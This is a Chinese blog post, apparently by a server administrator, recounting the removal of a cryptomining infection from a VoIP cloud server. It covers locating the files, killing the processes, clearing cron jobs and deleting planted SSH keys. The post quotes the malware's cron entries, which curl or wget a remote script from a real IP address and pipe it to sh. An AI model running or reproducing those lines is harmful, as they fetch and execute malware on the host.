记一次服务器被挖矿程序入侵的解决过程

公司有台做voip的服务器最近CPU总是跑满，这机器自从交给厂家搭好环境后基本就没怎么管它，于是进去查看进程，top了下（见下图）



这个叫wnTKYg的进程很诡异，已经把CPU吃光了，上网一查，原来是中了挖矿的马。（啊，我的天。这只是一个单核1G内存的阿里云主机）既然被入侵了，那就得干掉它，下面是解决过程：

1：第一步要先找到这个wnTKYg文件实体，对了还有一个叫ddg.2020的进程。

[root@alitest ~]$ find / -name wnTKYg
/tmp/wnTKYg
[root@alitest ~]$ find / -name ddg*
/tmp/ddg.2020

2：接着把这两个文件的可执行权限拿掉。

[root@alitest ~]$ cd /tmp
[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg

3：杀掉这该死的进程。

[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9

4：清除无用的定时任务。

[root@alitest /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

这是挖矿程序生成的定时任务，不清除掉待会进程又起来了。

[root@alitest /tmp]$ echo > /var/spool/cron/root

因为这台机器上没有做定时任务，所以就直接清除掉了，如果有其他在用的定时任务，不要这样哦。

5：删除挖矿程序。

[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg

6：清除.ssh/下的公钥文件。

[root@alitest ~/.ssh]$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................

这台机器并没有上传过公钥文件，所以这就是入侵者留下的咯，删掉删掉。

[root@alitest ~/.ssh]$ rm -f authorized_keys

至此，木马就已经清理完毕了。

小结：

在网上查了一下，发现大部分挖矿入侵都发生在redis上，而我这台服务器并没有部署redis，而是当时厂家给装的一套voip环境，因此我怀疑是voip软件的漏洞导致了此次事件，之后再联系厂家看看。通过这次服务器被入侵的案例，再一次印证了安全的重要性，安全无小事，继续努力吧。
参考文档：
http://blog.csdn.net/zimou5581/article/details/73064878
http://blog.csdn.net/u013082989/article/details/51971121